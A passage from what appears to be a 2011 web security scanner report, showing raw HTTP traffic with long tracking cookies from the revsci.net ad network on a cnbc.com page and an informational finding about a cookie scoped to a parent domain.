rtc_622X=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; rsiPus_Sjxc="MLsXtSUNJjhvJpE4W8XcxPALFPJgPeDE7Ff6CLs1Rb8Vycmn5M/kolpihGBj4llhxoQ3e3VA0m2LzBcz+ue/ihtvjfvgayBVyGF/RjfbpAgcG5Mcyyi0ZXCuRIFFGgX4kD52HvpM8rrsQ0999uRzoYdDUACqK8KlRc8VFICoy0+PItrM99Y8jEqlvqvQNZiPH0T5++F/VA7BqzXTG3qlxbAeYCYpBkIDo4s6qsVrCy+CkZUKalTKsevS3D2n1PHf7iTT9uE4x4PTaP+VBHgV+nk4mUM7NfTxGnZjv701p4Bz71ZESNNYsNI022R1zWk+u8asEUZ42tgMNxTy+2paVdH7M6zZfpfvv4++QMjudbnF9jfSOabfmWXvtxQIfRWWjAsmO7iksYDAvLYs1rAidhNI3biAvrpHcKDOPQDwPtq51BqMFGXJ0K1pchWpIGU1nA451gYfsDNCbuMzqTe2I3LyJ2oA3Q11FFtSsYBTaLnG0rHubVQ2Pu/HJoREoy9Vim2KKjt2EMGxcm+juTFAovId4TVM1TLGFW6TU4E1QQ0pk/9WyI4uxTJXQMlZjVhbqVRyOksep9WCCmbUH6xaucVujijxw8AgVX/25XxpalbwhOiZxRCI9wO/KQeW0pyCfnZVr8I+G9MPHQCVyJDO2LHsbRrxZxzIGNSzox9U/CdWg0tplBca8HVYzlc+VVcE5HUk0nJFyDkN4OsnDaPtI1TFPiDzyQ7w6XgEVxtXvxO7LfMZuNySGnJVDxL/o/6VJXoUI0ccqeuxey8JgQDFaM75Ps01yErrYr0Gmh1w3PBYpIHm65XUaborqFueLJer/8S71nmpcI1Ytd1VoLLIw+sWAcSuAjMqgcpfp2Ew2xAaS6oTgdcmMYUZ3BXrpihrxwuoRXq1Av+iaeptiiJN+WombSzbEwIqSuzFHluZv5iKnqHNq2o5gNfqCUJX02flKVbY3Kc1A9j4K9TnH3McyW9HkBpEq3xwA84D8eBxq/JGbTwVCyYPATg0NBQ20t+Pl1w7zJaSiuzZ31xyIKdArXY1sk1gNTWE2EeTUKEdCgZUzr3Mo6YTG+KKTGwpaIpdycg4gUV8A2JPmZvenMQ2/I+Bg0Hq3ZiNu7uZGvksjpir6E0hxjh/2mDLJl0LWVmK/1Ayo7DPCEXJTUQmqSF5zQwFiP4RSrkEZ3BBAadMl9GE1Pp+Cp86JFdpUUgBvechRX4wMgy7ZyHYDKC7EdUn8tWh+N5mBLmHUbauYP7ffmSgArwO6pqaoWLOma+0f51Qpe9YDdotNkwSJSUGGo0KrmxTVN0617QMIghlMHgPfGU1U6tG9G6gy7CyQc6SNq9L0kjwDTf5u+2dDQUC3yffLZfi"; rsi_us_1000000="pUM14ymnMBYY7dXKYa7+iv3EgSSw/Y8tJ+gZNnYLLHa8d4Y1v2nKt6v830clUxoW8kHMFG9bRXElVO6lLZjWsTAhzzNfE+pD3lAuHGHVp514nWGQnCu6brt5PUxGRUlQamUvZIBZOhHhqaWIknb5L5bfPjNdHiOI3+L71fEzWoRn+y4+5eRBTByQ9gkvqh/99HNVJg0Mhx7jT93632OtMFe7lcendZZd8NDEWPbpffS+GCpH6QqL2BsceChO/XL4EGbINZl9Qi2qEn7l9PZaOmvg0qDTl+Y3fcKZnj7j4ZAdNBzxjmibF2GJbKtRn0KC35m5ml4Z5LApFxb/CiPL7I0l48ouIu7qWXjHBJeyxrMgxdOisTldj3/E2OpD+rwDxm9OZaG2T/zFtCloP6m0ZukU3G+1275N/HSnVI8L/b1JRdufb7yEj0PWuyHmTy5E7QQkZdUhbQF7xyU5KaS5GnOUmaSSK0KsNpkn9goI6R+O6RuEyKV6Y6I4xtLUrPiX/+AkKyLYUsAYUCgIQtU3UVO9MQ7M0nI0gHn/YOcrt8JEh3b6lbllwvb27pjF3OFasg6lsdnecccbs7u/mc8fAX83E9pgEmRJ3LXPHVktd2HeDBqBsrcxnSv0l6Zg78apOPubX52OcSFvO6lciUX9A8WNiVcGJUkIlGc1WvKXDXnga6xk8e0i4q8tMzUn4T+rbQ83v/SYy/xbh8sP0ximayS9XZWO5+CluJkUk85bZMbCuB+IkzKYAl4aqZQ4ZvHoJq4zTxglm2ewijhKHhzErTPi0iMmBv4Ht8FJhCENtmChEiqxhdiDDP1SeW8h3eEPIBXDCs/wHf/xSMiEJwAP2Y98pc6DHfosuzCREAzM3TYioHSfNZFpQLwpvqLLAHKFDUakZ3P93Zp7WEmE9V6tD6Pup8UJryE1CORWQiB9Rst+H4Ve8ib/zR3GE7riSAwx/nmNBX+TympwelaDVPoCe5vP/0UpciqM2r2WdO0yZt9U7mCaVOj9vjofyg7KjB3JJ3a7QQ2+ItWxXxOvADytVwDRCaETLlfSXZRF8MTvb5toU0JrcfZK1avEeIy22iiKkgzYJ83IX1u99j0PmDe5IcWhX/WJm+tmxN/jF1vtCGUgz7Ai8vI5sbkVScmLZpP79tRSj7KRTbHt5bmt3pD9paLKXnnPw9aNvrV7iQAtTFQQ3b7DTPwspPo31rZwg7RQiCwPwoAyeKS7qmqpFa41E2D7AY1vCymy5rHBznZwcs9Uap3I8MoBSjJNbUm5oiD7qjGXiA/asG7cNMyPVdM8k279gMCVK8Ot2OeGW2+Lg8ipfQyW5UpXT0O2laq7+hit06IJ6Vj2lTGE3P5BjBAOAYNoyFhyjb4g5rGv0KC/6nOmFnflH6QXTLRmCFX2YuzoEsnz8x/NWATjx0UzdFwa0s2juTD+nN/P2TuW6EJsMEbCo01RjWNaFUCiVIvbFUvZn+t7y3VCPlzeQjF4Gg7rVqNbo5hNH01RdxeyHXnnjJRMHfvUilaps7Lfez4NizQRUzJyASf9Ra4CFDTBdqxuOSCVllk7hNyoMQsbx6PN/jnk/dcI0ru2PzO1rZVq3klwDdQHbVLqRJwB0OtTxDbldSezYA+TC9cD2vc/70I7fBSLlGMXBqVGRux0UmPGRhIpanmn3y44kKGnFCdK+4ZlA7f1/RRlJwavT9iN+qu+vuSurjPYNGjV6Bl79S7vXAhOHm9AUZ4VYS7F0+LlFP39ziqq5M7lAK7nIL1e8VzFCP68KRzWzJ/7U7yDGY6VgFiEVQEr68Y="; rsi_segs_1000000=pUPF5EmhOQMMpzaxu2F29/z4eoxYqCQLAjTX17HF2gQ4O3XYcv0liDtqNncA2iFgL2JciE4z/2iaPmPX0PZEBa5THqhL8Vtypo+SEqfqKrhJdPaHwQlBIe6iD7zRzZlP3ivfC9uJamaWvpbVB03OAqYO3nwIMN4A0EWPixZ0W6zDG6mES70gBRV2cbgIsfnYVURrt1voweTUSq+JaAcAZcfMpau+hQFGNIZNW4KE+8+tv5ctHP8R0eNg8zAqI3kP9pFdrQsmOUA19iyAVNLDYKmj+5Unp77wIOYppmwgnW7reJezutwMWb+AE1+1QMb9AarH27s5beAFkpt9FQAS4ws3EEqTt1/78UvFi5mv8BeFLS0QXnyIWxVLA7TDYzYrT0cPoyL4tH41Wh/rAaMF0AXd27gsV9Hvs/dOrkkxAzPBbQmXrC8bMO+Lq0G4BzhnqmW8mHkHL8x/hPhw0caRFkg0dm4zWhSZD3wKOPKSodhQioNgfNz10Mj8qvv4WOIpkTSPAI10oc9TyDXa+iFcISsu1ynbSyQvGTrFrXJ8g9f5G80z21vnfo2+WIMTRUT6NpLum8UjhV5mzV4bNO/6sjr2IsR8JsYydAnJkMLav+Ksqm04dnNV38PeeC4e8oXN4vhhNc1kGzK6NDj3boMOfcsYGdo8h9rCakirCPM=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSMKLT2uikdn5vw/ZUsicc4VPat72X0BRE3fmuDUz/xw+ppzybIZwS4Eca2TOPNNPf1VWx+g6q/yqUz7hReIUafnkll3Rq9qruA1HphVsEataiCU4UsktlzVfsKfbGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdrai8EDZe5QGsJaR2lbzBppIqOW4sghTvfDbBz9w6xOnT6rKWeoL4o7hjL6yZJnvXVE/sak4VW1ruM/+CyXwJk4Hw4YSr369H0jhzHFve3eZhMuANMVlHLPP5gs5zBNa0q4sbKxPSlJ+Dr9tNi3/kNAewybd7S4DSWipP44CIAMVSFYHAD053+0LFGYD6cdJHq+Xxmn8pVBku2H5LxEeONgXe2Rb0eURb/DUc8APYKUwl8auJCEmLIdLrK3FGlmLgXyl5F5sYnIsytuxFsAUBEpmQ232iRqQn4VheUU+7XmFCi7gwUI1/JSNLf3zVlP93r+tmLtsYrZSu4olovzFDWLZalCAK9m0inSch7wHrKI2jDUlKH251qJet39UNQmd+V5pabMBUMBnSgPn8qcRoMKbm4MH0u9ddDZ35h8C7g7+ztf1TvTm7N6yq2hVkZ7u74bje6nfDdoHA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:05:11 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:05:11 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.195. http://pix04.revsci.net/I10985/b3/0/3/1008211/812722846.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/812722846.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uzs22rMriQJ4Ym1N1EuC/pV+zq2jLxL9z1pFHcD2oMpIyt/lxMhiEmSOkHFIHZeBImHWKCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa0AbFjW9PtKIFHNv4PL1RUaJzrH2RPUn836DjPQ4L4Uubj0NaY9wI2qjpCay/9h6Y4N/vrTyarBrZy/5p1vkVo6HLAj5TEabu+hT6vIheCK3a3RumjiC3vPwuMZAz/Fb6dCVvlO9Aw5pwWF9+EAAeV2TzsgUGaQv/2ZQe8rRPH5+5M9R39Ral+qP2V0y/+p2zRg1hLjVsjl1uwVWfKX77O/YPBY7dk2EjwvOdsWypIoh5qvkdbyxlttmCesrPwFb3/F6egiCumX5QrgmivUjRchduzfmZbwpTxy48V0WNVX4PvVH5gTOeAh2tnOpYIRwgMo1Y55QogoAQ+LrZpfryua2rcBmooHEc/TPGSsRiiDTykHRSaRMKCZmWMl334vqqCDsgfxTkfFRDJiwmuN0wq2iNRtk37UWndpoYVv1oFEpCVZNQU4C1q6lU5uQwGrTGJkFYxk+SOGtNllWGDyeMeLcz6EXlCQLXUM45YSnoRE/CFCdK49wepWGR2w0OLPEDVjNdOOen2Iuk5ZAbz6ympB6lcs/X3NM0=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:56:17 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/812722846.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_Vaww="MLsXtSMNJyhvJZH0ecXcxPALrEtuUCF+UoWp6s1T5naB64mAw0+Om2ozfWioJheIF3Jk6SbsCfwKDgvE+mtzitFk50puyRiAexgzTSs66arpoS8BeVDO8RUiqhraX7I4lUnumgVtBMVC6E+uIyenwlspAfS0UQtXbsnXhZ640xwJtT75XZSNaJDMSomB5FjVzZQy7ocv/wijzb0mY82YA1rmbM45cBkICSn3NtFzXhLMIuvvbHizzyv/e3Wow3Ny5TkVZz8Rh2VUu40Z8ChUReDDW+rpveTEd5DN7xIBmPQ+brxPkvgsQ2GSet9K8b/Fz8XEahkFGnbm2JQ8zOB77S46tKVWyOvYSTjdkMVnao8btlWR2aZ/ZyEwA68zAvqxYENTDmTwyvuspoAeUuUo2cG3W5zQKbUt1sIiXQ3CIOwy17ZHJpSOpw+/sY9FR8tRfQLwxzCggI8md3lIt1gsWKQALElMXazMQyyp2bHRZHR7AkhrjHV5BfCOm29oHfHdEQlY26nPnlj5KX7xyknwrvQZbslVdDhxrNhVi4ecAmrkjs5qSrwnIQ57KU+Nk0qHJ471fowk8Gfedh0DHfonNPRVcp3E+Fqxl0xYtrvDloyjNm1yEdGaHJGX9FV5RrA5HZEt1rWj4ULzJ3UMWG503BhTG/H+ricN8DprGqaHhIDSGIU2r6/BYp/5e55h7vrfZr/2P504E3ybPhwSwL7tIwztJ3nntkiIUjGcy/jvuhO7+7aQyI71nMxGF44CSM4P0WOdHjxZEZkjlIDIgstNh7KYUT6AE0rvYr3ByXtU2b/NNcUfyikIetmVjJtQGKcPnayGZtN9UtiFiPl6wxiC2qG7aFBp/NPOxuI3EqXtBoaMw/c7ayPcMMe5sbO2yTnGBb6UPvUWT1DEaQIQ3eJCXUQM2lagSnQv8KTjtG7wLb792lwXedT7lF8n7XqjdroObZIphRBm069MMUjLpnLfWqxtxeVYK4OGzyMzDkFl8nHJK+ynhcLbHC28X3Z+KQTPweyaU9W/P/zYE6GcYht96vQWoTZdjyB443Dk+e2xU+gwVTlrxLRbT0I7xPA8XOK5Pg0ZdsE/il+jwyEkMMbTmPTzYNG49TJ3kp6MwXNT+4YkIsDKdisBkADtF31pWCUHZWVix7yFeelxJclM6S5FKwb4cSPHCXDwUDGa4X+WvZ6QOB0WVJjAVYvQCYOmfmUi/Ej69UZdRc64HFxC7ulq2F9fBz11IXFDBzKtNEHoFbA8uw0eVpSm0UjCAZ243BsIMIGRiFa1gQ1fElul+ubiJAIAVHoo57RfXpTl0V/ycaXKKbxY7ELK8OBwGX0E5zY2B/cu91Hj51sMX5uyp/eYqd5threWmg=="; 